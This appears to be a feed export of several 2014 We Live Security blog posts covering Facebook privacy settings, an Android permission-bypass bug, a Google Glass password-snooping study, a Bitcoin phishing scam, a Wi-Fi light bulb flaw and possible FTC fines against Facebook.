Facebook settings – five steps for better privacy and security http://www.welivesecurity.com/2014/07/08/facebook-account-settings/ http://www.welivesecurity.com/2014/07/08/facebook-account-settings/#comments Tue, 08 Jul 2014 15:31:17 +0000 Facebook settings – five steps for better privacy and security http://www.welivesecurity.com/?p=46992 Facebook has faced repeated controversy over privacy, with features such as Graph Search revealing information which users might have forgotten they ever “shared”. But there are steps users can take to manage the way Facebook uses their information.

The post Facebook settings – five steps for better privacy and security appeared first on We Live Security.

]]>
Facebook has once again found itself embroiled in controversy over privacy and ownership of data, after information emerged on a psychological experiment which involved altering the posts which appeared in users’ News Feeds in 2012.

Facebook has faced repeated controversy over privacy, with features such as Graph Search revealing information which users might have forgotten they ever “shared”.

Facebook settings explained

The only way to keep data truly private is not to share it on Facebook at all. But there are steps users can take using their Facebook settings to manage the way the social network uses data – and it’s worth refreshing your account, privacy-wise, even if you’re a seasoned and security-conscious site user, as new ‘features’ from Facebook often seem to involve further security concerns.

The most important thing to remember is that simply visiting the Facebook Settings menu is not enough. It’s a good first step, allowing you to take control of who you share posts with (see step one), how to control what other people post about you (step two) and apply quick controls to older posts (step three). But for a “deep clean”, you need to visit your profile page as well (click on your portrait in the top left of the main News Feed), and do some tidying in Activity Log, which details all your past posts and posts you have been tagged in (steps two and three). Facebook’s own guide to privacy offers some useful advice, broken down by section.

If you want to take control of your Facebook settings, it’s best done from a PC or Mac – Facebook’s mobile apps don’t offer the fine control that the browser version does.

Below are five quick steps to changing your Facebook settings and to ensure you’re managing what people know about you effectively.

1. Take control of your posts

The first step to ensuring you are not “oversharing” on Facebook is to use and understand Facebook’s Audience Selector tool. This appears as a drop-down menu on every picture, post and link you share (or have shared) on the network. You can also use this menu to  limit posts retrospectively (a useful tool if you’re worried about work colleagues finding pictures you might have shared years ago).

Facebook has a detailed guide to using Audience Selector. It’s worth noting that if you share something once, then share it again, it will share with the audience you first selected by default. Be sure you know what audience you are sharing with – and that means policing your Friends list regularly. There’s little point limiting posts if you’re friends with people you don’t really know. If you have ever accepted a friend request from someone you don’t know (for instance, in a social game), it’s best to unfriend them. Befriending people on networks such as Facebook is a known tactic for identity fraudsters and other criminals – so it’s worth being cautious.

Use this menu to control who posts are shared with

Use this menu to control who posts are shared with

Once you’ve pruned your Friends list, you should limit ALL posts to Friends Only. That way you know who is seeing your posts. If anything is set to share with “Friends of Friends”, that basically means “anyone”. You have no control over who your friends have made friends with on the network  and trusting your data to these unknowns is unwise.

Trusting people you don’t know with your data has become even more risky due to the site’s new search engine, Graph Search. This lets any Facebook user search for things such as people’s Facebook Likes, or even their location, with search terms such as, “People who like pizza who live in…”. This can reveal data which could be damaging. One of the key steps to controlling any data on Facebook is to ensure that all posts are set to “Friends Only” or “Only Me”.

facebook account settings privacy settings

 

Make sure all your Facebook settings - photos, Likes, personal information – is set either to share with Friends Only or Only Me. You’ll have to visit both the main Privacy menu (under Settings) and Activity Log (under your Timeline, which is accessed by clicking your picture from the main menu), to ensure past posts don’t come back to haunt you.

2. Manage posts other people have tagged you in

Facebook’s Graph Search, introduced last year, radically increased the speed at which people could find information and images about people on Facebook. The tool, a powerful search engine built using Microsoft’s Bing, can “reveal” posts which are hidden from user timelines, and which users may have forgotten existed.  It can also, worryingly, be used to find posts in which a user has been tagged – and managing this data requires an investment of time.

To regain control over tagging, you should use Facebook”s ‘review’ process, which allows you to approve whether you can be tagged in images and other posts. This allows you to refuse a tag, for instance, if it’s a private post and you’re not comfortable sharing it with colleagues. You can still be seen in the photo, of course, but it will not appear in your Timeline or via a search for your name. You will have to review each picture for it to appear – but the added security is worth the effort. To enable Tag Review, visit Facebook Settings, then Timeline and Tagging, then Review Tags. Set the menu to Enabled.

When you approve posts, it’s worth revisiting Audience Selector to see who they’re shared with. People often share posts with the friends lists of everyone in a photo, or with all guests at an event. If you’re not comfortable with this, but still want to share the post, choose Custom from the Audience Selector menu, and exclude people you don’t want to see it (for instance Friends of Those Tagged).

It’s also worth using Facebook’s Timeline to police photos you may have been tagged with in the past. Visit Activity Log (a box on the right hand side of your profile page, which you can access by clicking your portrait from the top right of the main news feed). This will allow you to see a full list of posts from your Timeline. Mouse over the picture  or post you want to remove, click the down arrow, then click report/remove tag.

If you have previously hidden posts from Timeline, you should revisit them and set Audience Selector to “Only Me”. This ensures that people cannot find posts using Graph Search – posts hidden from your Timeline can still be visible, confusingly.

facebook account settings activity log

You will have to do this manually. Graph Search will not show off any photos or posts that are set to be private – i.e. ones that can be seen by “Only Me” or “Friends” – so choose these to be safe.

3. Make sure your Timeline doesn’t trip you up

Your Timeline is not a reliable indicator of what someone can find relating to you on Facebook – whether that be photos, comments, or Likes. Posts you have hidden from Timeline may well be visible – just not to someone browsing your page. If they search instead, for say “Photos of [Your Name]”, they’ll be clearly visible unless you’ve taken steps to alter your Facebook settings to police this.

facebook account settings timeline and tagging

The only tool which works to keep information private is Activity Log, which requires you to adjust privacy settings manually for each post. It’s worth doing  - otherwise, site users can simply search your name, and “Photographs” to see every post that you are tagged in, regardless of whether it’s on your Timeline or not.

4. Delete your search history

For many Facebook users, it might come as news that Facebook stores your search history at all – but it does, and tailors the results you receive accordingly. This data can be quite private – for instance, if you’ve searched repeatedly for a specific person, this can be very obvious, even if someone happens to glance over your shoulder as you use the site, as the function will auto-suggest the names you’ve searched for most frequently.

facebook account settings search

Thankfully, it’’s possible to delete this data entirely within your Facebook settings. Go to Activity Log (one of the options at the top of your Profile page), then select More, then Search. From this page, you’ll be given options to delete either individual searches, or your entire search history. By default, Facebook stores this data, and it’s available to anyone who sits down at a PC logged into your account.

5. Permanently delete your account – if you need to

From Facebook’s menus, it appears as if deactivating an account is the closest Facebook will let you get to deletion – but it’s actually possible to delete your account entirely.

This is a fairly drastic step, and it may be advisable to download a copy of your Facebook data before doing it. Otherwise it can be accessed by clicking the menu, then Facebook Settings, then the menu option, Download a copy of your Facebook data (below your General Account Settings), then Start My Archive.

facebook account settings privacy

A page with instructions on how to permanently delete your account is available here (note: you have to be logged in to Facebook to read these instructions, and following them will send a deletion request for that account). Once done, you have 14 days in which you can log back in and cancel the request, but after that point, there is no way to restore the data, and (crucially) people will not be able to search for or see your profile or any content you have shared on Facebook.

For a ‘softer’ option, ‘deactivating’ an account (found under Settings), lets you hide your profile and photos from Search, but the account can be reactivated, and some interactions (such as comments on other people’s pages) may still be visible.

The post Facebook settings – five steps for better privacy and security appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/08/facebook-account-settings/feed/ 7
Android bug in most smartphones could let rogue apps run wild http://www.welivesecurity.com/2014/07/08/android-bug-could-let-apps-run-wild/ http://www.welivesecurity.com/2014/07/08/android-bug-could-let-apps-run-wild/#comments Tue, 08 Jul 2014 13:54:13 +0000 Android bug in most smartphones could let rogue apps run wild http://www.welivesecurity.com/?p=47502 Nearly all Android smartphones contain bugs which can allow rogue apps to ignore the Permissions used to control them, according to German security researchers.

The post Android bug in most smartphones could let rogue apps run wild appeared first on We Live Security.

]]>
Nearly all Android smartphones contain bugs which can allow rogue apps to ignore the Permissions used to control them, according to research by German security company Curesec.

Curesec found two separate Android bugs, both of which have been active for months and even years – and can be exploited to place phone calls – potentially leaving phone users vulnerable to scams involving premium-rate numbers.

These Android bugs could also allow malicious apps to send instructions to carriers to change options on the phone such as call forwarding, according to The Register’s report. – again, without being granted permission to do so, or alerting the user.

Android bug: permission denied

The exploits bypass the Permissions used to control what apps can and cannot do – so users would not be alerted that a malicious app could make calls, according to Curesec.

Android normally has to grant permission so that your applications can conduct actions,” the researchers write. “If your installed application does not own the right to do a phone call, the Android OS should throw a permission denied.”

“However this bug is circumventing the situation and allows any malicious app to do a phone call, send [codes to the network] or hangup an ongoing call.”

PC World reports that Curesec believe one of the bugs was introduced in the Android Jelly Bean update, which was first made available in July 2012. The issue was patched in Android Kit Kat – but very few devices run the new software so far.

Active for years

The other Android bug is even older, introduced in Android Gingerbread. Taken together, The Register calculates, around 87% of current handsets are vulnerable to malware targeting the exploits.

Curesec offers two proof-of-concept apps to test whether  Android handsets are vulnerable, available freely via their website.

In ESET’s Threat Trends Report predictions for this year, ESET experts warned of “an escalating increase in serious threats targeting Android phones and tablets – ESET detections of such malware increased more than 60% between 2012 and 2013. This trend is predicted to continue in 2014.”

ESET Latin America’s Research Laboratory in Buenos Aires points out that malware afflicting Android now uses classic PC attack methods – the discovery of vulnerabilities, then their exploitation through malicious code.

Thankfully, most of these threats can be avoided by sensible use of your device. Robert Lipovsky writes, “We encourage users to protect themselves against these threats using prevention and defensive measures. Adhering to security best practices, such as keeping away from untrustworthy apps and app sources, will reduce your risks.”

The post Android bug in most smartphones could let rogue apps run wild appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/08/android-bug-could-let-apps-run-wild/feed/ 1
Google Glass wearers can steal passwords from 10ft away http://www.welivesecurity.com/2014/07/08/google-glass-wearers-steal-passwords/ http://www.welivesecurity.com/2014/07/08/google-glass-wearers-steal-passwords/#comments Tue, 08 Jul 2014 13:22:32 +0000 Google Glass wearers can steal passwords from 10ft away http://www.welivesecurity.com/?p=47494 A new computer vision attack could allow Google Glass wearers to steal passwords typed in on nearby tablet or smartphones - even if the attackers do not have a clear view of the screen.

The post Google Glass wearers can steal passwords from 10ft away appeared first on We Live Security.

]]>
A new computer vision attack could allow Google Glass wearers to steal passwords typed in on nearby tablet or smartphones – even if the attackers do not have a clear view of the screen, according to a report by CNN.

The technique could allow attackers to crack 90% of passcodes from up to ten feet distance – and regardless of whether the screen is obscured by glare. The distance is even bigger if an attacker uses a hi-def camcorder – up to 150ft, according to Wired.

If they take a video, you lose everything

“I think of this as a kind of alert about Google Glass, smartwatches, all these devices,” says Dr Xinwen Fu of University of Massachusetts in Lowell.

“If someone can take a video of you typing on the screen, you lose everything.”

Instead of “watching” the screen, the software developed by Dr  tracks the user’s finger in video recordings – tracking the fingertip’s relative position to the screen. The software harvests a pattern of “touch points” where the finger has contacted the screen, and works out passwords based on that.

Fu will present his findings at Black Hat USA 2014, in Las Vegas on August 6 and 7.

The major thing is the angle

The attack is not limited to simple PIN codes. “We could get your bank account password,” Fu told CNN. The security expert says that the ability to adjust the angle (easy with Google Glass’s head-mounted camera) offers attackers an edge.

“The major thing here is the angle. To make this attack successful the attacker must be able to adjust the angle to take a better video … they see your finger, the password is stolen,” Fu said.

Fu and his colleagues will show off a Privacy Enhancing Keyboard application for Android devices, which pops up a randomized keyboard whenever a password is required, but reverts to a normal QWERTY keyboard when not in use.

The researchers showed off the attack working when applied to Apple’s iPad, a Google Nexus 7 tablet, and an iPhone 5.

Fu says that his research is substantially different from previous attacks based on recognising touch inputs – as it does not use a language model to estimate touched keys. It relies purely on computer vision tools applied to an image of the finger using the touchscreen.

Fu says that the technique works quickly and unobtrusively enough to be a genuine concern in public arenas such as conferences.

“We are interested in scenarios such as conferences and similar gathering places where a Google Glass, webcam, or smartphone can be used for a stealthy attack,” he says.

The post Google Glass wearers can steal passwords from 10ft away appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/08/google-glass-wearers-steal-passwords/feed/ 0
Online Summer Safety Tips http://www.welivesecurity.com/podcasts/online-summer-safety-tips/ http://www.welivesecurity.com/podcasts/online-summer-safety-tips/#comments Mon, 07 Jul 2014 21:54:18 +0000 Online Summer Safety Tips http://www.welivesecurity.com/?post_type=post_podcast&p=47485 The post Online Summer Safety Tips appeared first on We Live Security.

]]>
The post Online Summer Safety Tips appeared first on We Live Security.

]]>
http://www.welivesecurity.com/podcasts/online-summer-safety-tips/feed/ 0
Silk Road Bitcoin auction bidders targeted in phishing scam http://www.welivesecurity.com/2014/07/07/silk-road-bitcoin-auction-bidders-targeted-phishing-scam/ http://www.welivesecurity.com/2014/07/07/silk-road-bitcoin-auction-bidders-targeted-phishing-scam/#comments Mon, 07 Jul 2014 15:33:01 +0000 Silk Road Bitcoin auction bidders targeted in phishing scam http://www.welivesecurity.com/?p=47423 A leaked list of people who had enquired about the auction for bitcoins from the “dark market” Silk Road provided a target for phishing scammers - and at least one site fell for the scam emails.

The post Silk Road Bitcoin auction bidders targeted in phishing scam appeared first on We Live Security.

]]>
A leaked list of people who had enquired about the auction for Bitcoins from the “dark market” Silk Road provided a target for phishing scammers – and at least one site fell for the scam emails.

A reported 100 Bitcoins ($63,300) were stolen from Bitcoin Reserve via a fake login page which harvested email credentials, according to TechCrunch’s report.

Coindesk reports that the scam targeted individuals on a list of people who had expressed interest in the auction for Bitcoins from Silk Road. The list was leaked after a member of the U.S. Marshals service used CC instead of BCC on an email.

Fake interview scam

The scam email – which the Wall Street Journal said had been forwarded to several people on the list, said, “I work for BitFilm Production. We are currently putting together some media for a client regarding the Silk Road seized Bitcoin auction by the USMS. I am hoping you could spare five minutes to review my interview questions and see if you would be willing to participate as a source. ”

While Bitfilm production is a real company, they had not sent the emails.

Interested parties who replied to the first email received a second email with what appeared to be a Google Document – instead, the link led to a scam site which required an email login.

A staff member at one firm, Bitcoin Reserve, logged in – and scammers then used his password and email to send a request to staff at the firm to forward Bitcoin to an online ‘wallet’.

100 Bitcoin stolen

Around 100 Bitcoin – worth $636 each at the time of writing, according to XE.com – were transferred before the scam was uncovered, according to the Wall Street Journal.

The U.S. Marshalls service said in a statement, “We encourage anyone believed to be a victim of a phishing scam to contact the appropriate law enforcement authorities. The FBI is the investigative agency for phishing scams in the United States. Go to www.ic3.gov/default.aspx for additional guidance.”

TechCrunch commented, “Given the irreversible nature of Bitcoin transactions I’d expect these scams to happen more and more often.”

Users of cryptocurrencies such as Bitcoin have been repeatedly targeted with scams and malware attacks in recent months. Read further We Live Security stories about Bitcoin.

 

The post Silk Road Bitcoin auction bidders targeted in phishing scam appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/07/silk-road-bitcoin-auction-bidders-targeted-phishing-scam/feed/ 0
Wi-Fi light bulbs in security alert over wireless blackout hack http://www.welivesecurity.com/2014/07/07/wi-fi-light-bulbs-in-security-alert-over-wireless-blackout-hack/ http://www.welivesecurity.com/2014/07/07/wi-fi-light-bulbs-in-security-alert-over-wireless-blackout-hack/#comments Mon, 07 Jul 2014 14:42:44 +0000 Wi-Fi light bulbs in security alert over wireless blackout hack http://www.welivesecurity.com/?p=47410 A high-profile ‘connected’ lighting system had a critical vulnerability which allowed attackers to take control of the entire system, switching off light bulbs at will, and which could be executed by criminals within 100 feet of a home.

The post Wi-Fi light bulbs in security alert over wireless blackout hack appeared first on We Live Security.

]]>
A high-profile ‘connected’ lighting system had a critical vulnerability which allowed attackers to take control of the entire system, switching off its Wi-Fi light bulbs at will, and which could be executed by criminals within 100 feet of a home, according to specialist security firm Context.

Context found the vulnerability in the LiFX system, a well-known Kickstarter-funded lighting system where a network of Wi-Fi light bulbs can be controlled via smartphone app.

LiFX describes the system as a, “Wi-Fi enabled, multi-color, energy efficient LED light bulb that you can control with your smartphone.”

Electronics Weekly said that the hack was a “warning for all Internet of Things companies”.

Printers and baby monitors also at risk

Speaking to Electronics Weekly, Context’s Michael Jordon said, ““It is clear that in the dash to get onto the IoT bandwagon, security is not being prioritized as highly as it should be in many connected devices We have also found vulnerabilities in other internet connected devices from home storage systems and printers to baby monitors and children’s toys.”

The researchers found a vulnerability in the wireless mesh network the bulbs used to communicate, which could have enabled attackers to control the system.

Context said that by gaining control of one “master” bulb, they could control the entire network, and intercept communications containing the bulbs’ network credentials – all without the smartphone app being alerted that there was anything wrong.

The firm admits that obtaining the firmware was difficult  - having had to use a hammer on a bulb and reverse-engineer it from the electronics – but says that later in a product’s lifecycle the process would be easier, when firmware would be available as a download on the internet.

Context said in its blog post, “With any internet connecting device, whether phone, laptop, light bulb or rabbit, there is always a chance of someone being able to hack it.”

LiFX has since issued a patch for the vulnerability and communications between bulbs will now be encrypted.

Hacking a Wi-Fi lightbulb

Speaking to CBR Online, Michael Jordon of Context said, “Hacking into the light bulb was certainly not trivial but would be within the capabilities of experienced cyber criminals.

In some cases, these vulnerabilities can be overcome relatively quickly and easily as demonstrated by working with the LIFX developers. In other cases the vulnerabilities are fundamental to the design of the products.

“What is important is that these measures are built into all IoT devices from the start and if vulnerabilities are discovered, which seems to be the case with many IoT companies, they are fixed promptly before users are affected.”

Last year, Philips Hue “connected lighting” system was criticized over its security, after a researcher showed off an attack which could have caused a “perpetual blackout” in the homes of users, according to a security researcher.

The post Wi-Fi light bulbs in security alert over wireless blackout hack appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/07/wi-fi-light-bulbs-in-security-alert-over-wireless-blackout-hack/feed/ 0
Facebook may face FTC fines over research into users’ emotions http://www.welivesecurity.com/2014/07/07/facebook-epic-ftc-complaint-emtional-research-privacy/ http://www.welivesecurity.com/2014/07/07/facebook-epic-ftc-complaint-emtional-research-privacy/#comments Mon, 07 Jul 2014 06:22:34 +0000 Facebook may face FTC fines over research into users’ emotions http://www.welivesecurity.com/?p=47309 With EPIC filing an FTC privacy complaint against Facebook, which is already the subject of a Consent Order due to a previous privacy settlement, the social network could be facing a hefty fine for emotion-based manipulation of the Newsfeed for research purposes.

The post Facebook may face FTC fines over research into users’ emotions appeared first on We Live Security.

]]>
Facebook’s 2012 experiment in manipulating the emotions of users, documented in research published last month, may do more than upset people and raise serious privacy issues, it may cost the social network a lot of money in 2014. That’s because Facebook has been is trouble over matters of data privacy before, leaving it exposed to potentially hefty fines. In November 2011, Facebook agreed to a proposed settlement with the Federal Trade Commission (FTC), something we blogged about numerous times. As we noted back then, the settlement:

“bars Facebook from making any further deceptive privacy claims, requires that the company get consumers’ approval before it changes the way it shares their data, and requires that it obtain periodic assessments of its privacy practices by independent, third-party auditors for the next 20 years.”

Facebook agreed to this in order to settle FTC charges that it deceived consumers “by telling them they could keep their information on Facebook private, and then repeatedly allowing it to be shared and made public.” Included in that settlement, finalized by the FTC in August of 2012, is this language:

“When the Commission issues a consent order on a final basis, it carries the force of law with respect to future actions. Each violation of such an order may result in a civil penalty of up to $16,000.”

This is the same type of provision that resulted in a $22.5 million fine for Google in 2012, when the FTC charged that Google, operating under a similar FTC settlement, misrepresented to users of Apple’s Safari browser “that it would not place tracking ‘cookies’ or serve targeted ads to those users.” This was deemed to violate the earlier settlement meant to resolve FTC charges that Google used deceptive tactics and violated its privacy promises with the social network, Google Buzz. That Consent Order, in October 2011, “barred Google from – among other things – misrepresenting the extent to which consumers can exercise control over the collection of their information.”

Bearing all of the above in mind — the numerous privacy-related FTC settlements and FTC Consent Orders, the potential for fines, and the timeline — it might seem quite staggering that someone at Facebook still thought it was okay to conduct an experiment on users, without telling them or getting their specific, individual permission, during the week of January 11–18, 2012. However, it has been my experience that companies of the size attained by Facebook by the end of 2011 often fail to keep all departments and personnel on the same page, particularly when it comes to matters of privacy.

A classic indicator of this type of corporate dysfunction is “post facto” remediation, in this particular case, the specific change that Facebook made to its data use policy in May 2012, four months after the research, adding a previously unmentioned use of your Facebook data:

  • For internal operations, including troubleshooting, data analysis, testing, research and service improvement.

As the journalist Kashmir Hill, a keen “watcher” of Facebook, pointed out in Forbes, that provision was not in place when Facebook intentionally manipulated the “Newsfeed” for hundreds of thousands of users in order to gauge their emotional response:

“In January 2012, the policy did not say anything about users potentially being guinea pigs made to have a crappy day for science, nor that “research” is something that might happen on the platform.”

To drive the point home, Hill’s article provides this handy link to a PDF of the pre-research version of the Facebook Data Use Policy. Hill also presents the arguments offered by Facebook defenders, namely that “they did this to improve the service” and “every website is doing A/B testing all the time.” However, both arguments seem to miss the point about this research experiment, as Hill herself opines, “the Facebook study with its intention to manipulate the Facebook environment for unknowing users to see whether it made them feel elated or depressed seems different to me than the normal ‘will this make someone more likely to buy this thing’ kind of testing.”

I concur. When you go shopping, at a website or brick-and-mortar store, you know that what you see is what the retailer wants you to see. You are prepared for the fact that what you see will be influenced by what the retailer knows about you. That is entirely different from a. Facebook choosing the term “Newsfeed” to describe a very selective view of your social network’s activity driven by an algorithm, and b. manipulating that algorithm to manipulate people’s emotions, without their knowledge or permission.

Now that EPIC (the Electronic Privacy Information Center) has filed formal legal documents with the FTC, alleging that Facebook engaged in deceptive trade practices and violated a 2012 Consent Order entered into with the FTC, there is potential for Facebook to be hit with FTC fines. I think it is quite possible that the commissioners will agree with the arguments made in the complaint (PDF). Bear in mind that the FTC takes EPIC seriously (it was an EPIC complaint that brought about the FTC action against Google mentioned earlier).

And that belated addition of “research” to the Facebook data use policy? It my come back to bite Facebook given point two of the complaint: “At the time of the experiment, Facebook did not state in the Data Use Policy that user data would be used for research purposes.” It is going to be hard for Facebook to argue that the provisions of the earlier version of the policy covered research when they later added research as a specific use.

So, how would those fines, if levied, be calculated? That appears to be up to the discretion of the commissioners. However, I expect that someone within Facebook is currently doing some research that goes like this:

  • Assume each person manipulated by the research = 1 violation,
  • where fine per violation = $16,000,
  • then maximum potential fine = 689,003 x $16,000 = $11,024,048,000.

America’s FTC is not the only body investigating the Facebook research project. Data protection authorities in the UK and Europe are said to be looking into it. This is not surprising since a. some 80% of Facebook users are outside America, and b. many Europeans have strong opinions about privacy rights and ethical research. As useful document to read in this regard is the Framework for Research Ethics (FRE) published by the Economic and Social Research Council (ESRC). The second of the six “Principles, procedures and minimum requirements of the Framework for Research Ethics” reads:

  • Research staff and participants must normally be informed fully about the purpose, methods and intended possible uses of the research, what their participation in the research entails and what risks, if any, are involved.

The framework acknowledges there may be isolated exceptions to informed consent, but makes it clear that these are very narrow, and I don’t think they would apply to Facebook research. What do you think about Facebook’s experiment? Does it bother you? Leave a comment and let us know.

The post Facebook may face FTC fines over research into users’ emotions appeared first on We Live Security.

]]>
http://www.welivesecurity.com/2014/07/07/facebook-epic-ftc-complaint-emtional-research-privacy/feed/ 0